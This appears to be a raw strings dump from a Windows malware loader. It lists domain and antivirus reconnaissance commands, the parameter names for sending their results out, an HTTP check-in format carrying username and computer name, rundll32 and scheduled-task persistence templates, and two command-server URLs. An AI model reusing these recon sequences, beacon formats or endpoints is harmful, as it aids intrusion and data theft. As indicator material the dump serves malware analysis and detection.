
/c ipconfig /all
C:\Windows\System32\cmd.exe
/c systeminfo
C:\Windows\System32\cmd.exe
/c nltest /domain_trusts
C:\Windows\System32\cmd.exe
/c net view /all /domain
/c nltest /domain_trusts /all_trusts
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
/c net view /all
C:\Windows\System32\cmd.exe
&ipconfig=
/c net group "Domain Admins" /domain
C:\Windows\System32\cmd.exe
/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
C:\Windows\System32\wbem\wmic.exe
/c net config workstation
C:\Windows\System32\cmd.exe
/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
C:\Windows\System32\cmd.exe
/c whoami /groups
C:\Windows\System32\cmd.exe
&systeminfo=
&domain_trusts=
&domain_trusts_all=
&net_view_all_domain=
&net_view_all=
&net_group=
&wmic=
&net_config_ws=
&net_wmic_av=
&whoami_group=
{
"pid": 
"%d",
"proc": 
"%s",
"subproc": [
]
}
&proclist=[
{
"pid": 
"%d",
"proc": 
"%s",
"subproc": [
]
}
&desklinks=[
*.*
"%s"
]
Update_%x
Custom_update
.dll
.exe
Updater
"%s"

rundll32.exe
"%s", %s %s
runnung
:wtfbbq
%d
%s%s
files/bp.dat
%s\%d.dll
%d.dat
%s\%s
init -zzzz="%s\%s"
front
/files/
Facial
.exe
Content-Type: application/x-www-form-urlencoded
POST
GET
curl/7.88.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
CLEARURL
URLS
COMMAND
ERROR
eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
<html>
<!DOCTYPE
%s%d.dll
12345
&stiller=
%s%d.exe
LogonTrigger
%x%x
TimeTrigger
PT0H%02dM
%04d-%02d-%02dT%02d:%02d:%02d
&mac=
%02x
:%02x
PT0S
;
&computername=%s
&domain=%s
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
\*.dll
%04X%04X%04X%04X%08X%04X
%04X%04X%04X%04X%08X%04X
\Registry\Machine\
https://jarinamaers.shop/live/
https://wrankaget.site/live/
AppData
Desktop
Startup
Personal
Local AppData